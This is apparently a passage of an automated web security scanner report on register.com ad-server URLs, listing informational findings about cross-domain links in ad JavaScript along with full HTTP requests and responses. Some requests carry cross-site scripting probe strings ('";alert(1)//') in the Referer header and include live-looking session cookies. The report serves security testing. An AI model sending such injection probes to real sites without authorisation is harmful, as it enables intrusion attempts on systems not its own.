<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1250935007/x54/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/393328253/x55/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/274473936/x56/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/795944793/x57/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/886205406/x58/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/2028439528/x59/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/141830077/x60/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

17.16. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1483365740@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/index/1483365740@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1483365740@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom?

The response contains the following link to another domain:

http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/index/1483365740@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/css59ae9%22%3balert(1)//903e1a040cb/home-optimized.css;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production
Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; mbox=check#true#1315085892|session#1315085812182-148030#1315087692|PC#1315085812182-148030.19#1317677832; OAX=Mhd7ak5indMAAU0C; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.1.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4621
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1938191849/Bottom/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1620674613/Position1/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/812331092/x50/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/574420983/x51/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/329414919/x52/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1714352799/x53/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1570088640/x54/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1409787697/x55/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1088803955/x56/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/826776264/x57/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1117733223/x58/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1284696262/x59/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/330157419/x60/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

17.17. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1617096016@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/index/1617096016@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1617096016@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom?

The response contains the following link to another domain:

http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/index/1617096016@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/favicon.icod8565%22%3balert(1)//1bdb2705792
Cookie: TLTSID=E7F82DE2D67410D60DB8F7326230B644; mbox=session#1315085812182-148030#1315088065|PC#1315085812182-148030.19#1317678205|check#true#1315086264; OAX=Mhd7ak5indMAAU0C; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.5.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:42:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4621
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1619387865/Bottom/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/732201532/Position1/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/856350641/x50/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/2029791139/x51/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1618624888/x52/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1154671295/x53/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1694151695/x54/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/454114230/x55/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1254976700/x56/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1626524611/x57/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1818874343/x58/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1889349448/x59/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/42308380/x60/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

17.18. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1629838351@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/index/1629838351@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1629838351@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom?

The response contains the following link to another domain:

http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/index/1629838351@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/jsc2708%22%3balert(1)//8e023ddd2cd/jquery-1.3.2.min.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production
Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; mbox=check#true#1315085921|session#1315085812182-148030#1315087721|PC#1315085812182-148030.19#1317677861; OAX=Mhd7ak5indMAAU0C; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.3.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:37:05 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4620
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/660299146/Bottom/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/502314879/Position1/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/100881004/x50/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/733809962/x51/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1600456157/x52/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1575712437/x53/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1199200615/x54/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/751870800/x55/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1166958408/x56/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/521027360/x57/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1160161521/x58/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1919177475/x59/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1502330312/x60/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

17.19. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1911929966@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/index/1911929966@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1911929966@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom?

The response contains the following link to another domain:

http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/index/1911929966@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(1)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; mbox=check#true#1315085906|session#1315085812182-148030#1315087706|PC#1315085812182-148030.19#1317677846; OAX=Mhd7ak5indMAAU0C; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.2.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4621
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1000359338/Bottom/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1018832504/Position1/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1821709947/x50/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1240355193/x51/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/696495835/x52/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/601292412/x53/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1098866644/x54/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1342030967/x55/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1448954919/x56/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/270612196/x57/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1392233784/x58/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/885587589/x59/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
